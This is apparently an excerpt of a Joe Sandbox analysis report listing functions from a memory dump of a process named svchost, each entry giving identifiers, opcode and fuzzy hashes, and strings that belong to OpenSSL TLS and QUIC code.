                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: D_unlockD_write_lock
                                                                                              • String ID:
                                                                                              • API String ID: 1724170673-0
                                                                                              • Opcode ID: 3e2fc8946b76cb5eaf65be944e05885da1a3aa126775283d273222caf7c7f219
                                                                                              • Instruction ID: fb252be323507e12e38e8eff88d886579ac29228cc39afafff046461ec5d3688
                                                                                              • Opcode Fuzzy Hash: 3e2fc8946b76cb5eaf65be944e05885da1a3aa126775283d273222caf7c7f219
                                                                                              • Instruction Fuzzy Hash: EF21A462B16B8182DE59CB65E5841BC6364FB44BF4F089331EE7D437E4DF28E4A14700
                                                                                              Function 00007FFBAB434380 Relevance: 3.1, APIs: 2, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: D_unlockD_write_lock
                                                                                              • String ID:
                                                                                              • API String ID: 1724170673-0
                                                                                              • Opcode ID: 979abf4c36315698262437b1d788520d1c39c78566ec60faab6647c1b7c5aa6c
                                                                                              • Instruction ID: 86191eb9db6328471be626e535feb91319a4d1242424174b25711b49964e25c0
                                                                                              • Opcode Fuzzy Hash: 979abf4c36315698262437b1d788520d1c39c78566ec60faab6647c1b7c5aa6c
                                                                                              • Instruction Fuzzy Hash: 1B11B762B1668182EAD9C776E5913AC5254FF84BA0F5C9231EE3D4B3E5EE2CE4A14700
                                                                                              Function 00007FFBAB42ABF0 Relevance: 3.0, APIs: 2, Instructions: 39COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: D_unlockD_write_lock
                                                                                              • String ID:
                                                                                              • API String ID: 1724170673-0
                                                                                              • Opcode ID: 9e4c8861634b07395019d21bd421997d3ee797798958cb0ceabcd2a845e9ab01
                                                                                              • Instruction ID: 0eab8a635cf357bc9a8d70368b98ee70c20d6972dadc5a3135e54371e148a52f
                                                                                              • Opcode Fuzzy Hash: 9e4c8861634b07395019d21bd421997d3ee797798958cb0ceabcd2a845e9ab01
                                                                                              • Instruction Fuzzy Hash: F101ACA1B1A68182EB61C736E58013D73A0EF44FD4F188131FE6D977BDDE19D8918700
                                                                                              Function 00007FFBAB434490 Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: D_read_lockD_unlock
                                                                                              • String ID:
                                                                                              • API String ID: 102331797-0
                                                                                              • Opcode ID: ee977cf21fc2f06eeed3c504d5e502464a44a7d1926803bfeeb1d38bdead9eee
                                                                                              • Instruction ID: 496071588b321ab9382cbba475d25f0b61d9206a93ff70dd46e3c62afea162da
                                                                                              • Opcode Fuzzy Hash: ee977cf21fc2f06eeed3c504d5e502464a44a7d1926803bfeeb1d38bdead9eee
                                                                                              • Instruction Fuzzy Hash: 4D01A963B1915181FFE28F75D2902FD23A4EF58B84F1C8031DF1C8729AEE28D9918700
                                                                                              Function 00007FFBAB425070 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: D_unlockD_write_lock
                                                                                              • String ID:
                                                                                              • API String ID: 1724170673-0
                                                                                              • Opcode ID: ae2795d83f2dd0469105e5662993c064e7fadfbe39b4a13fca9410659630e3ba
                                                                                              • Instruction ID: 68445bdf6667c8b6774100dc4ce03276b5c3876ce6e9d6fe5aed476801f4eace
                                                                                              • Opcode Fuzzy Hash: ae2795d83f2dd0469105e5662993c064e7fadfbe39b4a13fca9410659630e3ba
                                                                                              • Instruction Fuzzy Hash: E9E09B62B1A581C2EB55DB75F5812BC6264EB88FD4F085030FF1C8779AEE18C8914700
                                                                                              Function 00007FFBAB41E880 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: D_run_once
                                                                                              • String ID:
                                                                                              • API String ID: 1403826838-0
                                                                                              • Opcode ID: e552e1595eddf55d9bda5fef5e8713f0ba23a84a1552e7b2f3fd66b83ff83818
                                                                                              • Instruction ID: 142a435684dac9697e4c3181d238f0cf1c3ef7a3b5e5a503f1508482828a2d1b
                                                                                              • Opcode Fuzzy Hash: e552e1595eddf55d9bda5fef5e8713f0ba23a84a1552e7b2f3fd66b83ff83818
                                                                                              • Instruction Fuzzy Hash: 50D0C994E5B40781FA52A738D8921A82361EF40344F80D532D96C072B2DD1CE1198781
                                                                                              Function 00007FFBAB42AAD0 Relevance: .0, Instructions: 7COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e3fde73c0907c6d1bdd10f0d0a2eb25f473c61afb0bfbc14c72bb83f05379019
                                                                                              • Instruction ID: f65419ce3e23e2542f7436af4d2a7466f87e603dd674eb17c269a40f2941efa7
                                                                                              • Opcode Fuzzy Hash: e3fde73c0907c6d1bdd10f0d0a2eb25f473c61afb0bfbc14c72bb83f05379019
                                                                                              • Instruction Fuzzy Hash: 09C092CAEEF503C7F222A7B9D49627C01909F51714F10CA32E92D002A2AC1CA29A4B42
                                                                                              Function 00007FFBAB4281E0 Relevance: .0, Instructions: 7COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e71367a5cdd664070f3cd5486dcb2730325718983b9183ad3455429ea35ca620
                                                                                              • Instruction ID: 7620970db6bba09e11f78559f59b258b9209c62698198d4e7cb5ac9b34880f77
                                                                                              • Opcode Fuzzy Hash: e71367a5cdd664070f3cd5486dcb2730325718983b9183ad3455429ea35ca620
                                                                                              • Instruction Fuzzy Hash: 81C09BC9EDF503C7F1515375D44517C01904F51714F10C531D81D006619C1C51964742
                                                                                              Function 00007FFBAB4240E0 Relevance: .0, Instructions: 7COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a197af333fcfd2229e3cef50f634a98438f172a8e9ad05132fe7d6d96f6b45c2
                                                                                              • Instruction ID: dce908bc9b15f516f71112d12372e7eb4421449154787a7b5ab0a26eebb43eb5
                                                                                              • Opcode Fuzzy Hash: a197af333fcfd2229e3cef50f634a98438f172a8e9ad05132fe7d6d96f6b45c2
                                                                                              • Instruction Fuzzy Hash: F2C092CAEDF503CBF662A3B9D8863BC00908F51B14F10C931E92D00AA2AC1CA19A5782
                                                                                              Function 00007FFBAB434120 Relevance: .0, Instructions: 7COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1d6b5f847bdeb63c4fb04eeaefe5509c55cb80585699e1839566bed01d041387
                                                                                              • Instruction ID: 32b208fa4f914f283a64fd471837c01ecef0c4d6b99717414e4699236fce6b1f
                                                                                              • Opcode Fuzzy Hash: 1d6b5f847bdeb63c4fb04eeaefe5509c55cb80585699e1839566bed01d041387
                                                                                              • Instruction Fuzzy Hash: 88C092C2EEF603C7F662A7B9C4A637C00949F51710F11CA31EA2D002A1AC1CA29A4B42
                                                                                              Function 00007FFBAB425050 Relevance: .0, Instructions: 7COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 151583cd7ca4763808fd4a687b4efb3f67c8eca2445639832855fc5b7ea35d72
                                                                                              • Instruction ID: cdc4832efe8241067897a67cae4c5a5605cb7074377b3b712bb741acb5a7731c
                                                                                              • Opcode Fuzzy Hash: 151583cd7ca4763808fd4a687b4efb3f67c8eca2445639832855fc5b7ea35d72
                                                                                              • Instruction Fuzzy Hash: 59C092C6EEF503C7F622A7B9D49637C00909F51B14F10CA31EA2D006A2AC1CA19A5742
                                                                                              Function 00007FFBAB466310 Relevance: 72.0, APIs: 24, Strings: 17, Instructions: 200COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: <error processing frame data>$ Destination Conn Id: $ Packet Number: 0x$ Packet Type: %s$ Payload length: %zu$ Source Conn Id: $ Token: $ Version: 0x%08lx$ Datagram Length: %zu$ Frame: $ Packet$%02x$<zero length id>$<zero length token>$Received$Sent$Unknown
                                                                                              • API String ID: 4098839300-2049903181
                                                                                              • Opcode ID: 2fc939dcd989498532fdebe9518abc612a3e2f9722cf438c2e1e875e5c824fe1
                                                                                              • Instruction ID: dd9da589d0f904933e108467bcad823ec13f3f220b3f4febc4fdc7b99a6f1aff
                                                                                              • Opcode Fuzzy Hash: 2fc939dcd989498532fdebe9518abc612a3e2f9722cf438c2e1e875e5c824fe1
                                                                                              • Instruction Fuzzy Hash: BF916BE1E4AA5294FE26DB75E9900FC27A1AF45784F449136DE2E076B9DE3CE509C300
                                                                                              Function 00007FFBAB474290 Relevance: 52.7, APIs: 28, Strings: 2, Instructions: 154COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error$X_new
                                                                                              • String ID: ssl3_set_crypto_state$ssl\record\methods\ssl3_meth.c
                                                                                              • API String ID: 3158630193-2049820303
                                                                                              • Opcode ID: 5101c59aa68ee3393d43322b98f1a4acd6eff51a8c32219e74bb6ec9eb32ee5f
                                                                                              • Instruction ID: fee3c41fa81f99540f8ed0a27c0be14dadabedc9550f33109eba1bca7dcba121
                                                                                              • Opcode Fuzzy Hash: 5101c59aa68ee3393d43322b98f1a4acd6eff51a8c32219e74bb6ec9eb32ee5f
                                                                                              • Instruction Fuzzy Hash: 8C619FB1A0E64282E666EB71D4922FE7350EF41384F908532EE3D43AF6DE2CE449C601
                                                                                              Function 00007FFBAB47A8C0 Relevance: 50.9, APIs: 22, Strings: 7, Instructions: 169stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: strncmp$R_newR_set_debug$R_vset_error
                                                                                              • String ID: CONNE$GET $HEAD $POST $PUT $ssl\record\methods\tlsany_meth.c$tls_validate_record_header
                                                                                              • API String ID: 1021621777-2841161646
                                                                                              • Opcode ID: 67bfad5459e433cc4193c965d1d0c393b8247258666c6daa1f243ce290b52318
                                                                                              • Instruction ID: 0d5efa07dad90cd8f8f3a07b6c9542a105ac1f5142fcf79ec6b528555501f641
                                                                                              • Opcode Fuzzy Hash: 67bfad5459e433cc4193c965d1d0c393b8247258666c6daa1f243ce290b52318
                                                                                              • Instruction Fuzzy Hash: 07714CF0A1E64282FB63D772E9917B92351AF45740F84C036DE2D82AF6DE2CE589C741
                                                                                              Function 00007FFBAB416950 Relevance: 49.2, APIs: 25, Strings: 3, Instructions: 190COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Digest$Update$R_new$Final_ex$Init_exR_set_debugX_freeX_new$D_fetchJ_nid2snL_cleanseR_pop_to_markR_set_markmemcpymemset
                                                                                              • String ID: A$ssl3_generate_key_block$ssl\s3_enc.c
                                                                                              • API String ID: 2557040286-359777381
                                                                                              • Opcode ID: e584c2e9da6e5f393ddd4119df51808c353301be78a0e08073fd5a27a4efb0f9
                                                                                              • Instruction ID: c01938c9f841609b6bbb6ba08bacbd43dda9bdf98861724a4107ef00eb3976d2
                                                                                              • Opcode Fuzzy Hash: e584c2e9da6e5f393ddd4119df51808c353301be78a0e08073fd5a27a4efb0f9
                                                                                              • Instruction Fuzzy Hash: 4871E8E2A4E65245FB62EB72E4522BE5350EF88784F04D432EE6D476E6DE3CE508C701
                                                                                              Function 00007FFBAB482EB0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 316COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: $HMAC$SHA2-256$ssl\statem\extensions_srvr.c$tls_construct_stoc_cookie
                                                                                              • API String ID: 193678381-4098586831
                                                                                              • Opcode ID: 50c5b3cb4f7184f96c201f83d8d0f0fbfd58974cee0eea2d56210e7cbae781a4
                                                                                              • Instruction ID: f8954907f5d790b3c90af95eaa780701c6c8b797c9149b0a653f7ad099c602ae
                                                                                              • Opcode Fuzzy Hash: 50c5b3cb4f7184f96c201f83d8d0f0fbfd58974cee0eea2d56210e7cbae781a4
                                                                                              • Instruction Fuzzy Hash: 7BD16CA1F0A64381FB62ABB2D4563FD1391AF417C4F44C432EE2D87AA6EE3CE5058311
                                                                                              Function 00007FFBAB46646F Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: Destination Conn Id: $ Packet Number: 0x$ Packet Type: %s$ Payload length: %zu$ Source Conn Id: $ Token: $ Version: 0x%08lx$%02x$<zero length id>$<zero length token>$Initial
                                                                                              • API String ID: 4098839300-1860078395
                                                                                              • Opcode ID: 984a4ca65b395535d14a4b4b72b1098ce9b5ece42fb9197c3d5c9a990b7cf965
                                                                                              • Instruction ID: d4c058791735025ad6f383cfe61bef89749cd0a90ed4eb2a102a5a2c26cb84bb
                                                                                              • Opcode Fuzzy Hash: 984a4ca65b395535d14a4b4b72b1098ce9b5ece42fb9197c3d5c9a990b7cf965
                                                                                              • Instruction Fuzzy Hash: 92415DD0E4EA4294FE26DB75E8511FC2B619F457C4F449035DE2E172BADE3CE40A9300
                                                                                              Function 00007FFBAB466478 Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: Destination Conn Id: $ Packet Number: 0x$ Packet Type: %s$ Payload length: %zu$ Source Conn Id: $ Token: $ Version: 0x%08lx$%02x$0RTT$<zero length id>$<zero length token>
                                                                                              • API String ID: 4098839300-3071389416
                                                                                              • Opcode ID: 928cbb28a5ac4e3e552a890fde935cd0a2eb3a3cb215029dff804dde01864b20
                                                                                              • Instruction ID: 3be32018a1f119e0785b4076e8296f06d482648812521128047246ac85ecb4bf
                                                                                              • Opcode Fuzzy Hash: 928cbb28a5ac4e3e552a890fde935cd0a2eb3a3cb215029dff804dde01864b20
                                                                                              • Instruction Fuzzy Hash: F3415CD0E4EA4290FE26DB75E9911FC2B619F457C4F449036DE2E172BADE3CE50A9300
                                                                                              Function 00007FFBAB466493 Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
